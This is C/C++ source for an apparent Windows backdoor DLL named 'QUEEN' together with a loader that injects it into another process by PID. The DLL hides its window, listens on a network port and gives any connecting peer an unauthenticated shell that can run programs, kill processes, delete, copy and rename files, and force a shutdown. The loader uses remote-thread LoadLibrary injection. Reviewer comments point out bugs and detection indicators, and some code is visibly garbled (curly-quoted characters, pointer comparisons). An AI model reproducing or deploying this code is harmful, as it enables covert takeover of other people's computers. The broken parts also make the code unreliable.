OpenProcessToken(hProcess,TOKEN_ADJUST_PRIVILEGES, &hToken);
file://LookupPrivilegevalue(NULL, SE_SHUTDOWN_NAME, &luidPrivilegeLUID);
NewState.PrivilegeCount = 1;
NewState.Privileges[0].Luid = luidPrivilegeLUID;
NewState.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if(AdjustTokenPrivileges(hToken, FALSE, &NewState, NULL, NULL, NULL))
ExitWindowsEx(EWX_FORCE|EWX_POWEROFF,0);
}
}
//---------------------------------------------------------------------------
// ChangeDir
// Change the current directory
//---------------------------------------------------------------------------
// ChangeDir: exported wrapper around SetCurrentDirectory().
// Sets the process's working directory to szDir and returns TRUE on success,
// FALSE otherwise. ExeCommand calls it for the "cd" command, so szDir is
// text supplied by the remote peer with no validation beyond what
// SetCurrentDirectory itself does.
extern "C" __declspec(dllexport)
BOOL WINAPI ChangeDir(LPCTSTR szDir)
{
    if(SetCurrentDirectory(szDir))
        return TRUE;
    else
        return FALSE;
}
//---------------------------------------------------------------------------
// GetCurPath
// Report the current directory
//---------------------------------------------------------------------------
// GetCurPath: sends the process's current directory to the connected peer.
// Formats "CurrentDirect: <dir>\n\r" into szTemp and writes it to NewSock,
// a file-scope socket declared outside this excerpt.
// Reviewer note: szTemp is MAX_PATH characters but receives a prefix plus a
// directory of up to MAX_PATH characters, and wsprintf takes no buffer size,
// so the formatted write is not bounded by the buffer.
extern "C" __declspec(dllexport)
VOID WINAPI GetCurPath()
{
    TCHAR lpBuff[MAX_PATH];
    TCHAR szTemp[MAX_PATH];
    // Return value (0 on failure, or required size when MAX_PATH is too
    // small) is not checked; lpBuff may be unset in those cases.
    GetCurrentDirectory(MAX_PATH,lpBuff);
    wsprintf(szTemp,"CurrentDirect: %s\n\r",lpBuff);
    send(NewSock,szTemp,lstrlen(szTemp),0);
}
//---------------------------------------------------------------------------
// ExeCommand
// Execute a command received from the peer
//---------------------------------------------------------------------------
// ExeCommand: dispatches one command line received from the remote peer.
//
// szCommand is the text WndProc (FD_READ) accumulated up to the carriage
// return; hWnd is accepted but never used here. Every branch replies over
// NewSock, a file-scope socket declared outside this excerpt. Nothing in
// this function, or in WndProc which calls it, authenticates the peer: any
// client that reaches the listener can run every command below. That is the
// central risk this DLL poses to the host process it is loaded into, and the
// reply strings are usable network indicators for detection.
//
// Exact-match commands: getinfo, gcpath, enumps, exitwin.
// Prefix-match commands: "killps PID", "execfile NAME", "cd DIR",
// "dir [PATTERN]", "del NAME", "copy SRC DST", "ren SRC DST".
// GetSysInfo, EnumProcess, ExitWin, KillPS, LoadProcess, Dir, Delete, Copy
// and Ren are defined elsewhere in the file.
//
// Reviewer notes on the code as written (code left unchanged):
//  - Param1/Param2 hold 100 chars and szBuf MAX_PATH, but lstrcpy copies
//    from szCommand (a dwComm-sized buffer) with no length check.
//  - The "usage" branches for killps/execfile/cd/dir/del do not return, so
//    parsing continues after the usage reply; only copy/ren return.
//  - Each scan loop compares szCommand itself (a pointer) with a character
//    rather than indexing it; the curly quotes around \0 look like an
//    extraction artifact of '\0'.
//  - pid is never initialised before `pid+=` in the killps branch, and
//    PidArray has 5 slots while the loop bound is derived from the command
//    length.
//  - Two send() lengths do not match their literals: "usage : killps PID"
//    is sent with 12 bytes and "usage : DEL szFileName" with 28.
extern "C" __declspec(dllexport)
VOID ExeCommand(LPSTR szCommand,HWND hWnd)
{
    TCHAR szBuf[MAX_PATH];
    TCHAR Param1[100];
    TCHAR Param2[100];
    double PidArray[5],pid;   // pid is read (+=) below without initialisation
    int i;
    if((lstrcmp(szCommand,"getinfo"))==0)
        GetSysInfo();
    else if((lstrcmp(szCommand,"gcpath"))==0)
        GetCurPath();
    else if((lstrcmp(szCommand,"enumps"))==0)
        EnumProcess();
    else if((lstrcmp(szCommand,"exitwin"))==0)
        ExitWin();
    // killps PID: decode a decimal PID by hand and hand it to KillPS.
    else if((strncmp(szCommand,"killps",lstrlen("killps")))==0)
    {
        if(lstrlen(szCommand)<=lstrlen("killps")+2)
        {
            send(NewSock,"usage : killps PID",12,0);   // no return: falls through
        }
        // Scan for an embedded terminator after the keyword (see header note).
        for(i=lstrlen("killps")+1;i<lstrlen(szCommand);i++)
            if(szCommand==‘\0‘)
                break;
        if(i==lstrlen(szCommand))
        {
            lstrcpy(Param1,szCommand+lstrlen("killps")+1);
            int e=lstrlen(szCommand)-lstrlen("killps")-1;   // number of digits
            // Accumulate digits as a double: digit * 10^(remaining positions).
            for(int bit=0;bit<i-lstrlen("killps")-1;bit++)
            {
                PidArray[bit]=(DWORD)Param1[bit]-48;
                pid+=PidArray[bit]*pow(10,--e);
            }
            if(KillPS(pid)==FALSE)
                send(NewSock,"killps Fail",12,0);
            else
                send(NewSock,"killps OK",10,0);
        }
    }
    // execfile NAME: start a program via LoadProcess.
    else if((strncmp(szCommand,"execfile",lstrlen("execfile")))==0)
    {
        if(lstrlen(szCommand)<=lstrlen("execfile")+2)
        {
            send(NewSock,"usage : execfile szFileName",28,0);   // no return
        }
        for(i=lstrlen("execfile")+1;i<lstrlen(szCommand);i++)
            if(szCommand==‘\0‘)break;
        if(i==lstrlen(szCommand))
        {
            lstrcpy(Param1,szCommand+lstrlen("execfile")+1);
            if(LoadProcess(Param1)==FALSE)
                send(NewSock,"execfile Fail",14,0);
            else
                send(NewSock,"execfile OK",11,0);
        }
    }
    // cd DIR: change the working directory via ChangeDir.
    else if((strncmp(szCommand,"cd",lstrlen("cd")))==0)
    {
        if(lstrlen(szCommand)<=lstrlen("cd")+2)
        {
            send(NewSock,"cd Drive\\Directory",19,0);   // no return
        }
        for(i=lstrlen("cd")+1;i<lstrlen(szCommand);i++)
            if(szCommand==‘\0‘)break;
        if(i==lstrlen(szCommand))
        {
            lstrcpy(Param1,szCommand+lstrlen("cd")+1);
            if(ChangeDir(Param1)==FALSE)
                send(NewSock,"Change Directory Fail",21,0);
            else
                send(NewSock,"Change Directory OK",19,0);
        }
    }
    // dir [PATTERN]: list files; a bare "dir" lists "*.*" and then still
    // runs the scan below.
    else if((strncmp(szCommand,"dir",lstrlen("dir")))==0)
    {
        if(lstrlen(szCommand)<=lstrlen("dir")+2)
        {
            Dir("*.*");
        }
        for(i=lstrlen("dir")+1;i<lstrlen(szCommand);i++)
            if(szCommand==‘\0‘)break;
        if(i==lstrlen(szCommand))
        {
            lstrcpy(Param1,szCommand+lstrlen("dir")+1);
            Dir(Param1);
        }
    }
    // del NAME: delete a file via Delete.
    else if((strncmp(szCommand,"del",lstrlen("del")))==0)
    {
        if(lstrlen(szCommand)<=lstrlen("del")+2)
        {
            send(NewSock,"usage : DEL szFileName",28,0);   // 28 exceeds the literal's length
        }
        for(i=lstrlen("del")+1;i<lstrlen(szCommand);i++)
            if(szCommand==‘\0‘)break;
        if(i==lstrlen(szCommand))
        {
            lstrcpy(Param1,szCommand+lstrlen("del")+1);
            Delete(Param1);
        }
    }
    // copy SRC DST: split at the position found by the scan and call Copy.
    else if((strncmp(szCommand,"copy",lstrlen("copy")))==0)
    {
        if(lstrlen(szCommand)<=lstrlen("COPY")+2)
        {
            send(NewSock,"usage : COPY Drive\\Filename ",28,0);
            return;
        }
        for(i=lstrlen("copy")+1;i<lstrlen(szCommand);i++)
            if(szCommand==‘\0‘)break;
        if(i==lstrlen(szCommand))
        {
            // Scan reached the end: only one argument was found.
            lstrcpy(Param1,szCommand+lstrlen("copy")+1);
            lstrcpy(Param2,"");
            send(NewSock,"Copy File1 to File2",19,0);
        }
        else
        {
            // Split the copy at index i (the quoting here is an extraction artifact).
            lstrcpy(szBuf,szCommand);
            szBuf[i]=‘0‘;
            lstrcpy(Param1,szBuf+lstrlen("copy")+1);
            lstrcpy(Param2,szBuf+i+1);
            Copy(Param1,Param2);
        }
    }
    // ren SRC DST: same splitting scheme as copy, then Ren.
    else if((strncmp(szCommand,"ren",lstrlen("ren")))==0)
    {
        if(lstrlen(szCommand)<=lstrlen("ren")+2)
        {
            send(NewSock,"usage : REN Drive\\Filename ",28,0);
            return;
        }
        for(i=lstrlen("ren")+1;i<lstrlen(szCommand);i++)
            if(szCommand==‘\0‘)break;
        if(i==lstrlen(szCommand))
        {
            lstrcpy(Param1,szCommand+lstrlen("ren")+1);
            lstrcpy(Param2,"");
            send(NewSock,"Ren File1 to File2",19,0);
        }
        else
        {
            lstrcpy(szBuf,szCommand);
            szBuf[i]=‘0‘;
            lstrcpy(Param1,szBuf+lstrlen("ren")+1);
            lstrcpy(Param2,szBuf+i+1);
            Ren(Param1,Param2);
        }
    }
    else
        send(NewSock,"Bad Command !!!",16,0);
}
//---------------------------------------------------------------------------
// InitSocket
// Initialise the listening socket
//---------------------------------------------------------------------------
// InitSocket: opens the listening TCP socket that serves the command shell.
//
// Initialises Winsock, creates CreateSock, binds it to INADDR_ANY on PORT,
// starts listening (backlog 3) and registers the socket with hWnd so that
// accept/close events arrive as WM_SOCKET messages (handled in WndProc).
// Returns TRUE on success; on any failure it shows a MessageBox and returns
// FALSE. dwVersion, wsaData, CreateSock, Sock_in, dwFlag, addrlen, PORT and
// WM_SOCKET are file-scope names declared outside this excerpt.
//
// From the host's point of view the observable artifact is a new listening
// port on all interfaces owned by whatever process this DLL was loaded into;
// the error dialogs are the only user-visible output and WinMain hides its
// window otherwise.
extern "C" __declspec(dllexport)
BOOL WINAPI InitSocket(HWND hWnd)
{
    if((WSAStartup(dwVersion,&wsaData))!=0)
    {
        MessageBox(hWnd,"INIT SOCKET ERROR",NULL,MB_OK);
        return FALSE;
    }
    CreateSock=socket(AF_INET,SOCK_STREAM,0);   // create the TCP socket
    // Reviewer note: socket() reports failure as INVALID_SOCKET; this compares
    // against SOCKET_ERROR and then calls closesocket on the failed value.
    if(CreateSock==SOCKET_ERROR)
    {
        closesocket(CreateSock);
        MessageBox(hWnd,"SOCKET ERROR",NULL,MB_OK);
        return FALSE;
    }
    Sock_in.sin_family=AF_INET;
    Sock_in.sin_port=htons(PORT);
    Sock_in.sin_addr.S_un.S_addr=htonl(INADDR_ANY);   // listen on every interface
    // SO_REUSEADDR lets the port be re-bound quickly; return value unchecked.
    setsockopt(CreateSock,SOL_SOCKET,SO_REUSEADDR,(LPSTR)&dwFlag,sizeof(dwFlag));
    if(bind(CreateSock,(LPSOCKADDR)&Sock_in,sizeof(Sock_in))==SOCKET_ERROR)
    {
        closesocket(CreateSock);
        MessageBox(hWnd,"BIND ERROR",NULL,MB_OK);
        return FALSE;
    }
    else if(listen(CreateSock,3)==SOCKET_ERROR)
    {
        closesocket(CreateSock);
        MessageBox(hWnd,"LISTEN ERROR",NULL,MB_OK);
        return FALSE;
    }
    // Route FD_ACCEPT/FD_CLOSE for the listener to hWnd as WM_SOCKET.
    else if(WSAAsyncSelect(CreateSock,hWnd,WM_SOCKET,FD_ACCEPT|FD_CLOSE)==SOCKET_ERROR)
    {
        closesocket(CreateSock);
        MessageBox(hWnd,"WSASelect ERROR",NULL,MB_OK);
        return FALSE;
    }
    addrlen=sizeof(SOCKADDR_IN);   // used by accept() in WndProc
    return TRUE;
}
//---------------------------------------------------------------------------
// WndProc: window procedure for the hidden "QUEEN" window; all socket
// activity is driven from here via WM_SOCKET notifications.
//
// FD_ACCEPT: accepts the pending client into NewSock (overwriting any
//   previous client — only the most recent connection is served), subscribes
//   it to read/write/close events and sends a banner followed by PROMPT.
// FD_READ: receives into szCommand; if the first byte is a carriage return
//   (VK_RETURN) the text accumulated in szExec is passed to ExeCommand and
//   cleared, otherwise the received bytes are appended to szExec. In both
//   cases szCommand is echoed back.
// FD_CLOSE / select error: closes the socket carried in wParam.
// WM_DESTROY: calls HideProc(UNSERVICE_PROC) and quits.
// dwComm, PROMPT, WM_SOCKET, CreateSock, NewSock, NewSock_in, addrlen and
// HideProc are declared outside this excerpt.
//
// There is no authentication step between accept and ExeCommand. The banner
// "QUEEN Ver 0.5beat Write by NOIR" and the PROMPT string are sent in the
// clear on every connection, which makes them straightforward network
// signatures for this listener.
//
// Reviewer notes (code unchanged): send() is always given dwComm bytes, so
// the whole static buffer (including bytes past the terminator) goes on the
// wire; recv()'s return value is not checked; lstrcat into szExec has no
// bound, so a peer can overrun the dwComm-sized static buffer.
extern "C" __declspec(dllexport)
LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam)
{
    static TCHAR szCommand[dwComm];   // last chunk received / outgoing text
    static TCHAR szExec[dwComm];      // command accumulated until CR
    switch(message)
    {
    case WM_SOCKET:
        if(WSAGETSELECTERROR(lParam))
        {
            closesocket(wParam);
            break;
        }
        switch(WSAGETSELECTEVENT(lParam))
        {
        // New connection on the listener.
        case FD_ACCEPT:
            NewSock=accept(CreateSock,(LPSOCKADDR)&NewSock_in,&addrlen);
            WSAAsyncSelect(NewSock,hWnd,WM_SOCKET,FD_READ|FD_WRITE|FD_CLOSE);
            wsprintf(szCommand,"QUEEN Ver 0.5beat Write by NOIR\n\n\r%s",PROMPT);
            send(NewSock,szCommand,dwComm,0);
            break;
        // Input available: a carriage return executes the accumulated
        // command, anything else is appended to the command buffer.
        case FD_READ:
            ZeroMemory(szCommand,dwComm);
            recv(NewSock,szCommand,dwComm,0);
            if(szCommand[0]==VK_RETURN)
            {
                wsprintf(szCommand,"\n\n\r%s",PROMPT);
                send(NewSock,szCommand,dwComm,0);
                ExeCommand(szExec,hWnd);
                ZeroMemory(szExec,dwComm);
            }
            else
                lstrcat(szExec,szCommand);
            send(NewSock,szCommand,dwComm,0);   // echo
            break;
        case FD_CLOSE:
            closesocket(wParam);
            break;
        }
        break;
    case WM_DESTROY:
        HideProc(UNSERVICE_PROC);
        PostQuitMessage(0);
        break;
    default:
        return DefWindowProc(hWnd,message,wParam,lParam);
    }
    return 0;
}
//---------------------------------------------------------------------------
// WinMain: sets up the hidden server window and runs the message loop.
//
// Registers window class "QUEEN", creates a window titled "QUEENServer" and
// immediately hides it, optionally calls HideProc(SERVICE_PROC) when
// GetOS() reports a Win9x platform, then calls InitSocket (its return value
// is ignored) and pumps messages until WM_QUIT. GetOS, HideProc and
// SERVICE_PROC are defined outside this excerpt. The class name and window
// title are host-side indicators of this component.
//
// Reviewer notes (code unchanged): the declaration carries no return type
// before WINAPI; hKey, disp, lResult, szKey, szSysDir and szFileName are
// declared but never used, and the original comment before the message loop
// describes copying the file to the system directory and adding a registry
// autorun entry — no code in this excerpt does either, so that persistence
// step is presumably elsewhere or was removed.
extern "C" __declspec(dllexport)
WINAPI WinMain(HINSTANCE , HINSTANCE, LPSTR, int)
{
    HWND hWnd;
    MSG msg;
    WNDCLASS wndc;
    LPSTR szAppName="QUEEN";
    HKEY hKey=0;
    DWORD disp=0;
    LONG lResult;
    TCHAR szKey[MAX_PATH];
    TCHAR szSysDir[MAX_PATH+25];
    TCHAR szFileName[MAX_PATH];
    wndc.style=0;
    wndc.lpfnWndProc=WndProc;
    wndc.cbClsExtra=0;
    wndc.cbWndExtra=0;
    wndc.hInstance=NULL;
    wndc.hIcon=LoadIcon(NULL,IDI_APPLICATION);
    wndc.hCursor=LoadCursor(NULL,IDC_ARROW);
    wndc.hbrBackground=(HBRUSH)(COLOR_WINDOW+1);
    wndc.lpszMenuName=NULL;
    wndc.lpszClassName=szAppName;
    RegisterClass(&wndc);
    hWnd=CreateWindow(szAppName,"QUEENServer",
        WS_OVERLAPPEDWINDOW,
        CW_USEDEFAULT,CW_USEDEFAULT,
        CW_USEDEFAULT,CW_USEDEFAULT,
        NULL,NULL,NULL,NULL);
    ShowWindow(hWnd,SW_HIDE);   // the window exists only to receive WM_SOCKET
    UpdateWindow(hWnd);
    if(GetOS()==VER_PLATFORM_WIN32_WINDOWS)
    {
        HideProc(SERVICE_PROC);
    }
    InitSocket(hWnd);   // failure is not handled; the loop runs regardless
    // Original comment: copy the file to the system directory and register
    // it for automatic start. No such code is present here.
    while(GetMessage(&msg,NULL,0,0))
    {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }
    return (msg.wParam);
}
//---------------------------------------------------------------------------------
// start: thread entry created by DllMain; simply runs WinMain on a new
// thread so the server starts as soon as the DLL is loaded.
//
// Reviewer notes (code unchanged): the function is declared to return DWORD
// but has no return statement; GetCurrentProcess() yields a process
// pseudo-handle, not a module handle, and is passed as the HINSTANCE (the
// original comment itself suggests GetModuleHandle() instead); the parameter
// is named `not`, which is an alternative token for `!` in standard C++ and
// may not be accepted by every compiler.
DWORD WINAPI start(LPVOID not)
{
    HANDLE hinst=GetCurrentProcess();   // or HMODULE GetModuleHandle()
    LPSTR lpCmdLine=GetCommandLine();
    WinMain(hinst,      // current instance handle
        NULL,           // always NULL
        lpCmdLine,      // command line, from GetCommandLine()
        SW_SHOW);       // window show mode (WinMain hides the window anyway)
}
//---------------------------------------------------------------------------------
// DllMain: on DLL_PROCESS_ATTACH spawns a thread running start(), which in
// turn runs WinMain and opens the listening socket. Merely loading this DLL
// into a process therefore turns that process into a network listener — the
// behaviour the injector in this file relies on, and the reason a DLL whose
// load triggers thread creation plus a new listening port is a useful
// detection combination.
//
// Reviewer notes (code unchanged): szprocessid is allocated with new[] on
// every call and never used or freed; the thread handle is never closed;
// CreateThread's result is not checked; the second return is unreachable;
// and creating threads from DllMain is discouraged by the DllMain
// documentation because the loader lock is held during DLL_PROCESS_ATTACH.
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fwdreason, LPVOID lpvReserved)
{
    char *szprocessid=new char[10];   // unused; leaked on every call
    DWORD hthreadid;
    HANDLE hthread;
    switch(fwdreason)
    {
    case DLL_PROCESS_ATTACH:
        hthread=CreateThread(NULL,0,start,(LPVOID)1,0,&hthreadid);
        break;
    default:
        break;
    }
    return(TRUE);
    return 1;   // unreachable
}
//---------------------------------------------------------------------------
//--------------------------------------------------------------------------------------------------
Next, the code that loads the DLL into another process:
// Loader program: a separate executable that loads the DLL above into a
// process chosen by PID. The #pragma directives appear to be Borland
// C++ Builder specific (precompiled-header stop, suppress unused-argument
// warnings) and are ignored by other compilers.
#pragma hdrstop
#include <windows.h>
#include <stdio.h>
//---------------------------------------------------------------------------
#pragma argsused
// Forward declaration of the privilege-adjusting helper defined after main.
// Note: main() as shown below never calls it.
void EnableDebugPriv();
//---------------------------------------------------------------------------------------
// main: loads "test.dll" into the process whose PID is typed on stdin.
//
// The sequence is the textbook remote-LoadLibrary injection: open the target
// with PROCESS_ALL_ACCESS, allocate memory in it, write the DLL path there,
// resolve LoadLibraryA in this process (the address is reused for the
// target) and start a remote thread at LoadLibraryA with the path as its
// argument. From a defender's standpoint this exact cross-process chain —
// OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread into a
// LoadLibrary entry point — is what host-based monitoring commonly alerts
// on, and the resulting DLL load in the target is visible as a module load
// from an unexpected path.
//
// Reviewer notes (code unchanged): none of the API results are checked and
// the returned handles are never closed; scanf's result is ignored; the
// EnableDebugPriv helper declared above is never called; the DLL is named
// by bare file name, so the target resolves it through its own DLL search
// order (the original comment says to place it in SYSTEM32).
int main(int argc, char* argv[])
{
    int pid;
    char *pszLibFileName="test.dll";   // original comment: copy the DLL into SYSTEM32
    printf("please enter the inject pid:\n");
    scanf("%d",&pid);
    HANDLE hRemoteProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,pid);
    // Bytes needed for the path including its terminator.
    int cb = (1 + lstrlenA(pszLibFileName)) * sizeof(char);
    char *pszLibFileRemote = (char *) VirtualAllocEx( hRemoteProcess, NULL, cb, MEM_COMMIT, PAGE_READWRITE);
    WriteProcessMemory(hRemoteProcess, pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL);
    PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("Kernel32"), "LoadLibraryA");
    CreateRemoteThread( hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL);
    return 0;
}
//----------------------------------------------------------------------------------------
// Elevate privileges
// EnableDebugPriv: enables SeDebugPrivilege (SE_DEBUG_NAME) on the current
// process token so that OpenProcess can succeed against processes the caller
// would otherwise not be allowed to open. Enabling this privilege is itself
// an auditable event (token privilege adjustment) that precedes many
// injection attempts.
//
// Reviewer notes (code unchanged): the token handle is closed only on the
// failure paths and leaked when AdjustTokenPrivileges succeeds; also,
// AdjustTokenPrivileges can return non-zero while setting the last error to
// ERROR_NOT_ALL_ASSIGNED when the privilege is not held, so a "success" here
// does not guarantee the privilege is actually enabled. Nothing in this file
// calls this function.
void EnableDebugPriv( void )
{
    HANDLE hToken;
    LUID sedebugnamevalue;
    TOKEN_PRIVILEGES tkp;
    if ( ! OpenProcessToken( GetCurrentProcess(),      // pseudo-handle of this process
            TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,       // adjust the token's privileges
                                                       // and query its contents
            &hToken ) )                                // receives the opened token
        return;
    if ( ! LookupPrivilegeValue( NULL,                 // look the name up on the local system
            SE_DEBUG_NAME,                             // privilege to debug other processes
            &sedebugnamevalue ) )
    {
        CloseHandle( hToken );
        return;
    }
    tkp.PrivilegeCount = 1;
    tkp.Privileges[0].Luid = sedebugnamevalue;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;   // enable the privilege
    if ( ! AdjustTokenPrivileges( hToken,              // token to modify
            FALSE,                                     // FALSE: apply the changes described by tkp
            &tkp,
            sizeof tkp,
            NULL,
            NULL ) )
        CloseHandle( hToken );                         // only the failure path closes the token
}
//---------------------------------------------------------------------------